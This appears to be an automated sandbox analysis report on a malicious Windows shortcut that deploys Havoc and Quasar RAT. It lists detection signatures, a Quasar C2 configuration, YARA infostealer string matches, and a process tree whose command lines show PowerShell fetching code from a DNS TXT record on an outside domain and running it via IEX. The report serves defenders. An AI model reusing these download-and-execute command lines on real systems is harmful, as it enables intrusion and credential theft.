Edit tour

Windows Analysis Report
alyemenione.lnk

Overview

General Information

Sample name:	alyemenione.lnk
Analysis ID:	1577962
MD5:	12ca834e507ca967d01911cec7454312
SHA1:	2d43271a7ec861f87da9bdeced53bd9bb20986ff
SHA256:	9dd34887a7aa11ba28a8e63d484274110ab40a6ad7035f8ff93c19c12ec66542
Tags:	lnkuser-smica83
Infos:

Detection

Havoc, Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Havoc

Yara detected Powershell download and execute

Yara detected Quasar RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates an autostart registry key pointing to binary in C:\Windows

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Loading BitLocker PowerShell Module

Performs DNS TXT record lookups

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Sigma detected: System File Execution Location Anomaly

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Process Start Locations

Sigma detected: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7304 cmdline: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7576 cmdline: "cmd.exe" /c start "" "C:\Windows\Tasks\62rgx9T9MW.pdf" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Acrobat.exe (PID: 7612 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Windows\Tasks\62rgx9T9MW.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7808 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 8080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1720,i,1813560832827388052,3977061367603789960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

winver.exe (PID: 7284 cmdline: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc MD5: 8FA52F316C393496F272357191DB6DEB)

svchost.exe (PID: 7948 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Havoc	First released in October 2022, the Havoc C2 Framework is a flexible post-exploitation framework written in Golang, C++, and Qt, with agents called 'Demons' written in C and ASM, created by @C5pider. Designed to support red team engagements and adversary emulation, it offers a robust set of capabilities tailored for offensive security operations. The framework, which is under active development, utilizes HTTP(s) and SMB as communication protocols for its implants. Havoc can generate implants, known as Demons, in several formats including EXE, DLL, and Shellcode. A notable feature of Havoc is its ability to bypass EDR by employing advanced evasion techniques such as sleep obfuscation, return address stack spoofing, and indirect syscalls. This capability enhances its effectiveness in evading detection and circumventing security measures.	No Attribution	https://4pfsec.com/havoc-c2-first-look/ https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/ https://github.com/HavocFramework/Havoc https://github.com/Invoke-RE/stream-notes/blob/main/red-team/scripts/parse_havoc_generic.py https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "cdn-streaming.com:80;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "65768f90-1bce-4e20-baef-7e1bf22954c2", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "rhsyWXoCiIJqrBxv7EYv2tSZgcX2hjKLoCdYiML+ca1mXqlmVtNJyuT9Rk0P50Ok12L1D8piyRg2Co/HzYi3ewbIpj2xoYZH2zGIfcw9cVBbddymnDYZQdq71IY0WLI7R7niFAD8Q3cPut+n8JlfElcKf7vEhZc9KHoxNJRRO3w8AwxygZDvLijRkfOzhTvjEmOYYrPylIdVA9oUZtG1dvy9QMn++NILtdKoHpLK2SLuV+KtoWZPA24BoAfIyGdccDGlTS/0a/XNjsSAJpV5UG33hm9J9BOWnsfAP+RCjWYu15zLnpH4d9v3W66dpL4XKVxJK9AIBDv5jVcyzPkQ57GAFqASRXHSTsETrv2dhXqcVeId2NbqAzYr1IwH68kn+liigPdyXk2N6hAGvascuA0emdi6XRYiz1leWogvagJXtxT4dcLl/UIYIrwnDBMREICA9IWOIe8dzDGAIoyMQxgqfsZRCc3qL3HlAv4bkiWPk4lCyoWPTA31GPbGj3SpJvX6LkIk5LD3vTusnvU705K3V3kbiD1x7tDFADG3CU3LE0tkTQMsNG9uu6sVkrQGud/iVYFloYGhM7oOFnWm6gdSD5YN6tk+902mKUkYp5W32+f7V7jcFPnmdwICnS1ll/yG7NMta6eBTQtAnPHI2DUEUPbLME/o9lgBPmPIF5I=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAKiKPBvPlgeINAqKFVa9GTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTIxMzIwMTUzNFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxiPDRYkAuLoLcoDIrzpsnMiPl58nKlO/Ht4U5uNtlOv6oSxcv1stTQi2PaMY4Nye3fiTfV/EeOomF4jU/C5X9N5a2YJQMZ13czLthq5NzgsVyPpP3LY54NzXB0f+qiTUHQkLucBWqF8895QRkoWeXx8ZzLA/iiN2ZQOkpT2SbFNWUq4jTwXUbvY65JnywiusY8wnH53ybJV1OhiWdRJ7C77xuI4wBynd3grcK2nHYgY5ALmPbRPgG4YZzvhknyWtlTZ/gEXVfDJF9laR0cESl1h3Q74J8uEJD8qEHHAJbAlaMDA1xndM4TfzdYgZGJDkZhTywhvjbdUcHb/Wjwq369avPwQZNcbgjqsCkWjibdE30CSvwzRVFMFL1+o9FnthTq0XLfllwrfv3biEPtvUokRz+SWxL/cm01yHReC4NcH1cDK83xOlpmHY3y+lSRp4qkImDtNN9jsSHJzSqOKz1N/ttZwPpaii8LesnktHcwWKCU9vrffvamvyCGzcQrLeX47bqOtxWo/ZALRxxMW3x1PDEn+2GqlMtcxEyh2B6GHrNG7jF5hGrOHUSHg+iLI8p9hvoq01VpfCn+Dn62g1BlCglvLibKJrKtFWm4dHnWrVHMLN3q756SGEhmpXsVD0YZ9oPX76yHRNFZbMI19it+MfVRvF6L4UvTn5bS7vjxcCAwEAAaMyMDAwHQYDVR0OBBYEFBurVOJdfxFNTMSxkxmn1crYwAPAMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAJX++sY5hBqHxVfcyMsAt839DuI9FxixiT5t8ba5sSvt/4wrMtiV2yEuywR1mkxcS4E7HnEPe9BfByUv97f2m05UhCx+HS5edM6hn7TrZrI0Vs4KhXl/WQqYRP8s017gBQad0Ac+aO5yntzJsz37znrc0nX8N7t6R7kgg+dHAqfVSZoTlyeCOidbiU6UkBpR816BZ4w8VmFHgO6TpxHzirIXiXOsFp53dX7GZbQEvTrWO9kkQF2iVITGo1OAYU045n+75rX5I6H63FRpvhK1JgFOfSjdwoVAtM2zX6bekQ8XY0kK3mFwwjEhTQEROTRMPNi4PxS+3WJ6tmIKebiKhnA/5AUJlL/cdKcz+KuLP0aowTPmlfCgtkHiWWuFRY2975sQ96ezAFFa/z0Wl2Bca/LJzNL39gki45jOFizPTmBOZ1rTge9SqCwO8QegjmJa1w8nScgMiP0b1JxuVoi6bKPEBaMg1xEkcUpT3ho+L9un4qHQE3fKS9Pd1lhI6PFOOS6bpQOCy+MH1TLlIxuKsA+KtXwqj4/rf4F1JI69wnxfz5ZnE/wSHJlsnahZ/J8DAu5bnz0RLPSrIo9Iu1liijsVj2lTKRRSO7vFkppEylivc04aDZtHV0Fwf9WrJz6XLzzwZgVptfOE9LO2WzuuTNFrLKQH/ZNhMDTZ/v0kFHVn"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc	JoeSecurity_Havoc_2	Yara detected Havoc	Joe Security
C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc	JoeSecurity_Havoc_1	Yara detected Havoc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28cb02:$x1: Quasar.Common.Messages 0x29ce2b:$x1: Quasar.Common.Messages 0x2a9472:$x4: Uninstalling... good bye :-( 0x2aac67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8a24:$f1: FileZilla\recentservers.xml 0x2a8a64:$f2: FileZilla\sitemanager.xml 0x2a8aa6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a8cf2:$b1: Chrome\User Data\ 0x2a8d48:$b1: Chrome\User Data\ 0x2a9020:$b2: Mozilla\Firefox\Profiles 0x2a911c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fa865:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9274:$b4: Opera Software\Opera Stable\Login Data 0x2a932e:$b5: YandexBrowser\User Data\ 0x2a939c:$b5: YandexBrowser\User Data\ 0x2a9070:$s4: logins.json 0x2a8da6:$a1: username_value 0x2a8dc4:$a2: password_value 0x2a90b0:$a3: encryptedUsername 0x30df54:$a3: encryptedUsername 0x2a90d4:$a4: encryptedPassword 0x30df72:$a4: encryptedPassword 0x30def0:$a5: httpRealm
0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17934a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a955c:$s3: Process already elevated. 0x28c801:$s4: get_PotentiallyVulnerablePasswords 0x2768bd:$s5: GetKeyloggerLogsDirectory 0x29c58a:$s5: GetKeyloggerLogsDirectory 0x28c824:$s6: set_PotentiallyVulnerablePasswords
0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: powershell.exe PID: 7352	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: winver.exe PID: 7284	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.winver.exe.1f9f3be0000.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9f3be0000.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28cb02:$x1: Quasar.Common.Messages 0x29ce2b:$x1: Quasar.Common.Messages 0x2a9472:$x4: Uninstalling... good bye :-( 0x2aac67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9f3be0000.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8a24:$f1: FileZilla\recentservers.xml 0x2a8a64:$f2: FileZilla\sitemanager.xml 0x2a8aa6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a8cf2:$b1: Chrome\User Data\ 0x2a8d48:$b1: Chrome\User Data\ 0x2a9020:$b2: Mozilla\Firefox\Profiles 0x2a911c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fa865:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9274:$b4: Opera Software\Opera Stable\Login Data 0x2a932e:$b5: YandexBrowser\User Data\ 0x2a939c:$b5: YandexBrowser\User Data\ 0x2a9070:$s4: logins.json 0x2a8da6:$a1: username_value 0x2a8dc4:$a2: password_value 0x2a90b0:$a3: encryptedUsername 0x30df54:$a3: encryptedUsername 0x2a90d4:$a4: encryptedPassword 0x30df72:$a4: encryptedPassword 0x30def0:$a5: httpRealm
11.2.winver.exe.1f9f3be0000.3.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17934a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a955c:$s3: Process already elevated. 0x28c801:$s4: get_PotentiallyVulnerablePasswords 0x2768bd:$s5: GetKeyloggerLogsDirectory 0x29c58a:$s5: GetKeyloggerLogsDirectory 0x28c824:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.1f9f3be0000.3.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9f3be0000.3.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ad02:$x1: Quasar.Common.Messages 0x29b02b:$x1: Quasar.Common.Messages 0x2a7672:$x4: Uninstalling... good bye :-( 0x2a8e67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9f3be0000.3.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a6c24:$f1: FileZilla\recentservers.xml 0x2a6c64:$f2: FileZilla\sitemanager.xml 0x2a6ca6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a6ef2:$b1: Chrome\User Data\ 0x2a6f48:$b1: Chrome\User Data\ 0x2a7220:$b2: Mozilla\Firefox\Profiles 0x2a731c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2f8a65:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a7474:$b4: Opera Software\Opera Stable\Login Data 0x2a752e:$b5: YandexBrowser\User Data\ 0x2a759c:$b5: YandexBrowser\User Data\ 0x2a7270:$s4: logins.json 0x2a6fa6:$a1: username_value 0x2a6fc4:$a2: password_value 0x2a72b0:$a3: encryptedUsername 0x30c154:$a3: encryptedUsername 0x2a72d4:$a4: encryptedPassword 0x30c172:$a4: encryptedPassword 0x30c0f0:$a5: httpRealm
11.2.winver.exe.1f9f3be0000.3.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17754a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a775c:$s3: Process already elevated. 0x28aa01:$s4: get_PotentiallyVulnerablePasswords 0x274abd:$s5: GetKeyloggerLogsDirectory 0x29a78a:$s5: GetKeyloggerLogsDirectory 0x28aa24:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.1f9900100e8.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9900100e8.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ad02:$x1: Quasar.Common.Messages 0x29b02b:$x1: Quasar.Common.Messages 0x2a7672:$x4: Uninstalling... good bye :-( 0x2a8e67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9900100e8.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a6c24:$f1: FileZilla\recentservers.xml 0x2a6c64:$f2: FileZilla\sitemanager.xml 0x2a6ca6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a6ef2:$b1: Chrome\User Data\ 0x2a6f48:$b1: Chrome\User Data\ 0x2a7220:$b2: Mozilla\Firefox\Profiles 0x2a731c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2f8a65:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a7474:$b4: Opera Software\Opera Stable\Login Data 0x2a752e:$b5: YandexBrowser\User Data\ 0x2a759c:$b5: YandexBrowser\User Data\ 0x2a7270:$s4: logins.json 0x2a6fa6:$a1: username_value 0x2a6fc4:$a2: password_value 0x2a72b0:$a3: encryptedUsername 0x30c154:$a3: encryptedUsername 0x2a72d4:$a4: encryptedPassword 0x30c172:$a4: encryptedPassword 0x30c0f0:$a5: httpRealm
11.2.winver.exe.1f9900100e8.1.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17754a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a775c:$s3: Process already elevated. 0x28aa01:$s4: get_PotentiallyVulnerablePasswords 0x274abd:$s5: GetKeyloggerLogsDirectory 0x29a78a:$s5: GetKeyloggerLogsDirectory 0x28aa24:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.1f9900100e8.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9900100e8.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28cb02:$x1: Quasar.Common.Messages 0x29ce2b:$x1: Quasar.Common.Messages 0x2a9472:$x4: Uninstalling... good bye :-( 0x2aac67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9900100e8.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8a24:$f1: FileZilla\recentservers.xml 0x2a8a64:$f2: FileZilla\sitemanager.xml 0x2a8aa6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a8cf2:$b1: Chrome\User Data\ 0x2a8d48:$b1: Chrome\User Data\ 0x2a9020:$b2: Mozilla\Firefox\Profiles 0x2a911c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fa865:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9274:$b4: Opera Software\Opera Stable\Login Data 0x2a932e:$b5: YandexBrowser\User Data\ 0x2a939c:$b5: YandexBrowser\User Data\ 0x2a9070:$s4: logins.json 0x2a8da6:$a1: username_value 0x2a8dc4:$a2: password_value 0x2a90b0:$a3: encryptedUsername 0x30df54:$a3: encryptedUsername 0x2a90d4:$a4: encryptedPassword 0x30df72:$a4: encryptedPassword 0x30def0:$a5: httpRealm
11.2.winver.exe.1f9900100e8.1.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17934a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a955c:$s3: Process already elevated. 0x28c801:$s4: get_PotentiallyVulnerablePasswords 0x2768bd:$s5: GetKeyloggerLogsDirectory 0x29c58a:$s5: GetKeyloggerLogsDirectory 0x28c824:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.10957.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.10957.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ad02:$x1: Quasar.Common.Messages 0x29b02b:$x1: Quasar.Common.Messages 0x2a7672:$x4: Uninstalling... good bye :-( 0x2a8e67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.10957.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a6c24:$f1: FileZilla\recentservers.xml 0x2a6c64:$f2: FileZilla\sitemanager.xml 0x2a6ca6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a6ef2:$b1: Chrome\User Data\ 0x2a6f48:$b1: Chrome\User Data\ 0x2a7220:$b2: Mozilla\Firefox\Profiles 0x2a731c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2f8a65:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a7474:$b4: Opera Software\Opera Stable\Login Data 0x2a752e:$b5: YandexBrowser\User Data\ 0x2a759c:$b5: YandexBrowser\User Data\ 0x2a7270:$s4: logins.json 0x2a6fa6:$a1: username_value 0x2a6fc4:$a2: password_value 0x2a72b0:$a3: encryptedUsername 0x30c154:$a3: encryptedUsername 0x2a72d4:$a4: encryptedPassword 0x30c172:$a4: encryptedPassword 0x30c0f0:$a5: httpRealm
11.2.winver.exe.10957.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17754a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a775c:$s3: Process already elevated. 0x28aa01:$s4: get_PotentiallyVulnerablePasswords 0x274abd:$s5: GetKeyloggerLogsDirectory 0x29a78a:$s5: GetKeyloggerLogsDirectory 0x28aa24:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.1f9f2ed1997.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9f2ed1997.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28cb02:$x1: Quasar.Common.Messages 0x29ce2b:$x1: Quasar.Common.Messages 0x2a9472:$x4: Uninstalling... good bye :-( 0x2aac67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9f2ed1997.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8a24:$f1: FileZilla\recentservers.xml 0x2a8a64:$f2: FileZilla\sitemanager.xml 0x2a8aa6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a8cf2:$b1: Chrome\User Data\ 0x2a8d48:$b1: Chrome\User Data\ 0x2a9020:$b2: Mozilla\Firefox\Profiles 0x2a911c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fa865:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9274:$b4: Opera Software\Opera Stable\Login Data 0x2a932e:$b5: YandexBrowser\User Data\ 0x2a939c:$b5: YandexBrowser\User Data\ 0x2a9070:$s4: logins.json 0x2a8da6:$a1: username_value 0x2a8dc4:$a2: password_value 0x2a90b0:$a3: encryptedUsername 0x30df54:$a3: encryptedUsername 0x2a90d4:$a4: encryptedPassword 0x30df72:$a4: encryptedPassword 0x30def0:$a5: httpRealm
